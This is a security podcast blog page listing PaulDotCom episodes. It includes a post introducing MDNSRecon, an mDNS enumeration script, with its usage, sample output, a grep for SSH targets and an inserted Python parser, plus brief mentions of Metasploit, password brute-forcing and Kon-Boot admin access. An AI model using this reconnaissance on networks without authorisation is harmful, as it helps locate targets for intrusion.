Drunken Security News- Episode 296


So says Santa, 10 things that are not tricks or ingenious and more!

Security News Stories - Episode 296 Show Notes

Episode 296 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Pentesticles: Penetration Testing with Balls - Episode 296


Ben and Lawrence join us to talk shop, tell us what it's like to be pen testers in the UK, tips, tricks and more:

Episode 296 Show Notes

Episode 296 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Wireless Honeypots Using Claymore - Episode 296


Ben Jackson wrote some awesome Python scripts to set up a wireless honeypot. He comes on the show to give us a technical tutorial:

Wireless Honeypot Using Python - Episode 296 Show Notes

Episode 296 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

  • Hack Naked TV Episode 40


    In this episode we discuss the Yahoo Password Breach. We talk about SET, and finally we talk about the iTunes App Store "get stuff for free" attack-type thingy...


    Links for this episode:


  • Yahoo clear-text password leak
  • iTunes App store hack
  • Cross Platform Dropper


    Links to cool stuff our awesome sponsors are providing:


    CloudPassage offers a free Basic version of Halo that includes extensive cloud security features, such as host-based firewalls, vulnerability management, security event alerting, server account management and intrusion detection. Halo works with any cloud provider and makes server security portable across environments. The convenient Halo portal allows you to manage all your security from one screen, whether it's in public, private or hybrid clouds - even traditional data centers.

    Check it out here


    Manage your Big Data with the most scalable log & security intelligence platform for the Enterprise & Cloud. Don't take our word. Try it for yourself! For a limited time, download here

    Video Feeds:
  • Armitage



    Hey Everyone, been a long time since I have published but I am back and living here in the south west. I have got some cool stuff utilizing the latest BackTrack 5r2.

    Have you ever used the Metasploit GUI Armitage? If you are like me, you use the command line. I gotta say though, this GUI is pretty cool, and makes for nice presentation material. Well check it out, I did it using the latest ms12-004 hack. You will need the ability to play .m4v files to view it though.

    This one won't auto-play; you have to right-click the link and choose "Save As"... ENJOY

    Armitage-Metasploit

    Be Good, Be Safe, If you are going to hack, hack legally and responsibly ---I'm Out

    ~Mark Bennett

    MDNSRecon


    Recently I was chatting with my good friend Elliot Cutright, also known on Twitter as @nullthreat, about the recent changes I have been making to DNSRecon and several of the improvements. He commented that he would miss the MDNS enumeration feature I had on it originally. Due to my move to supporting Python 3.x as well as Python 2.x for the tool, I had to drop that feature; in addition, the library I used for it had been abandoned by its author for quite some time. MDNS is a great way to find all sorts of information about hosts in your same subnet, especially since the MDNS records act as regular DNS SRV records, where we get a Service name that most times includes the protocol and name, the Target for the service, the Port and a text field with additional information. In addition to this, one can resolve the hosts to their IPv4 and IPv6 addresses.

    Based on the request I wrote a Ruby script that leverages the tool avahi-browse, and set the following goals for the script:

    • Detect most of the supported MDNS records in the local subnet the attacker is connected to.
    • Do not resolve those services running on the attacker's machine.
    • Make sure that the output is useful and easy to parse and manipulate for a tester.

    The resulting script I called MDNSRecon, and it can be downloaded from my GitHub account at https://github.com/darkoperator/MDNSRecon

    root@bt:~# ./mdnsrecon.rb -h
    MDNSRecon Script by Carlos Perez (carlos_perez[at]darkoperator.com)
    Version 0.1
    Usage: mdnsrecon.rb [OPTION]
    --help, -h:
    show help
    --csv <file>, -c <file>:
    CSV File to save records found.
    --grep, -g:
    Output grepable Output with a delimiter of \
    <service>\domain\host\IP\port\txt
    If no option is given it will print records found to standard output.

    If run with no options we get output similar to this if machines are available:

    root@bt:~# ./mdnsrecon.rb 
    [-] Records found:
    [*] Host: bt.local
    [*] IP: 192.168.192.128
    [*] Port: 9
    [*] Service:Workstation
    [*] Text:''
    [*]
    [*] Host: ubuntu.local
    [*] IP: 192.168.192.129
    [*] Port: 9
    [*] Service:Workstation
    [*] Text:''
    [*]
    [*] Host: ubuntu.local
    [*] IP: 192.168.192.129
    [*] Port: 22
    [*] Service:_udisks-ssh._tcp
    [*] Text:''
    [*]

    If we want the output in a grepable format, we use the -g option so that cut and grep can be used to better find targets; in this example we look for SSH services:

    root@bt:~# ./mdnsrecon.rb -g | grep ssh |cut -d '\' -f4,5 --output-delimiter=" " -n
    192.168.192.129 22

    Now, in the case where we want to save the results in a format we can email to someone, or parse a larger set of results like those you can find on a conference floor (or so I was told), you can choose to save to a CSV file and later use a spreadsheet program or PowerShell on Windows to parse and slice:

    root@bt:~# ./mdnsrecon.rb -c lab.csv
    [-] Saving found records to lab.csv
    [*] 3 Records saved
    root@bt:~# cat lab.csv 
    service,domain,host,ip,port,txt
    Workstation,local,bt.local,192.168.192.128,9,''
    _udisks-ssh._tcp,local,ubuntu.local,192.168.192.129,22,''
    Workstation,local,ubuntu.local,192.168.192.129,9,''
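To show what the script is doing with the avahi-browse records, here is an added Python example (not part of MDNSRecon, which is Ruby) that parses the parsable output of `avahi-browse -arpt`, skips the services the scanning host itself advertises, and emits the same grepable and CSV layouts shown above. The sample output it parses is constructed, not captured from a real network, and the semicolon-separated field order is the one avahi-browse prints in parsable mode.

```python
"""Parse `avahi-browse -arpt` (resolve, parsable, terminate) output into
mDNS service records the way MDNSRecon presents them, dropping services
advertised by the host doing the scan.  SAMPLE is constructed, not captured."""
import csv
import io

# Constructed sample: resolved records start with '='; '+' lines announce a
# service before it is resolved and carry no host, address or port.
SAMPLE = """\
+;eth0;IPv4;bt;_workstation._tcp;local
=;eth0;IPv4;bt;_workstation._tcp;local;bt.local;192.168.192.128;9;
=;eth0;IPv4;ubuntu;_workstation._tcp;local;ubuntu.local;192.168.192.129;9;
=;eth0;IPv4;ubuntu;_udisks-ssh._tcp;local;ubuntu.local;192.168.192.129;22;
=;eth0;IPv4;printer;_ipp._tcp;local;printer.local;192.168.192.130;631;"txtvers=1" "rp=ipp/print"
"""

FIELDS = ("service", "domain", "host", "ip", "port", "txt")

def parse_avahi(text, local_host):
    """Records for every resolved line, skipping the scanning host's own
    services (the script's 'do not resolve our own machine' goal)."""
    records = []
    for line in text.splitlines():
        parts = line.split(";", 9)          # txt is last and may contain ';'
        if len(parts) < 10 or parts[0] != "=":
            continue
        _, _iface, _proto, _name, stype, domain, host, ip, port, txt = parts
        if host == local_host:
            continue
        records.append(dict(zip(FIELDS, (stype, domain, host, ip, int(port), txt))))
    return records

def to_grepable(records):
    """Backslash-delimited lines, the layout of mdnsrecon.rb -g."""
    return "\n".join("\\".join(str(r[f]) for f in FIELDS) for r in records)

def to_csv(records):
    """Same header row as the lab.csv shown above."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(records)
    return buf.getvalue()

def find_service(records, needle):
    """(ip, port) pairs whose service type contains needle, e.g. 'ssh'."""
    return [(r["ip"], r["port"]) for r in records if needle in r["service"]]

if __name__ == "__main__":
    recs = parse_avahi(SAMPLE, local_host="bt.local")
    print(to_grepable(recs))
    print(to_csv(recs))
```

Run against a real capture, this gives a quick inventory of what hosts on your own segment are advertising, which is the same data an unauthorised device would see.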

    So far I'm only supporting Debian, Ubuntu and BackTrack 5 as the platforms to run the script on, with BackTrack 5 recommended as the preferred one. I will add other Linux distributions depending on the number of requests I get. I do hope you find the script useful, and as with any of my projects, feedback and feature requests are always welcome.

    Using Nmap To Screenshot Web Services


    This segment talks about how to use custom Nmap NSE scripts to discover web services and take a screenshot of the resulting web page. Based on a script made available by Trustwave Spiderlabs:

    Episode 295 Show Notes

    Episode 295 Part 1 (mp3)

    Episode 295 Part 2 (mp3)

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

    Randy Marchany Interview - University Security, IPv6, BYOD


    Randy is the CISO for Virginia Tech and a co-author of the original FBI/SANS Institute "Top 10/20 Internet Security Vulnerabilities" document that has become a standard for most computer security and auditing software. He is the co-author of the SANS Institute's "Responding to DDOS Attacks" document that was prepared at the request of the White House in response to the attacks of 2000. He is also acknowledged as one of the North American masters of the hammer dulcimer:

    Episode 295 Show Notes

    Episode 295 Part 1 (mp3)

    Episode 295 Part 2 (mp3)

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

    Drunken Security News #295


    Malware modifying .htaccess files and so much more:

    Episode 295 Show Notes

    Episode 295 Part 1 (mp3)

    Episode 295 Part 2 (mp3)

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.


    Episode 295 of PaulDotCom Security Weekly will have on Virginia Tech CSO Randy Marchany to give us his viewpoint on security from a University setting. Come participate in our IRC channel or sit back and enjoy it live via our Ustream channel:

    NOTE: The video will play the most recent show up until we are live!

    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 295 show notes page.

    Don't forget to follow us on Twitter: Paul Asadoorian, Larry Pesce, Jack Daniel, Carlos Perez, John Strand and Mike Perez.

    Quick tip on how to easily brute-force a password when users are using really lame passwords:

    Episode 294 Show Notes

    Episode 294 Part 1 (mp3)

    Episode 294 Part 2 (mp3)

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

    Jeff McJunkin on Kon-Boot Over PXE


    Fun tech segment on how to setup your systems to use PXE and boot Kon-Boot over the network to give you admin access to machines:

    Episode 294 Show Notes

    Episode 294 Part 1 (mp3)

    Episode 294 Part 2 (mp3)

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

    Drunken Security News #294


    Can you stop a targeted attack? CVSS for penetration testers? Gartner, really?

    Episode 294 Show Notes

    Episode 294 Part 1 (mp3)

    Episode 294 Part 2 (mp3)

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

    Marcus Sachs Interview - Episode 294


    Marcus Sachs Interview:

    Episode 294 Show Notes

    Episode 294 Part 1 (mp3)

    Episode 294 Part 2 (mp3)

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.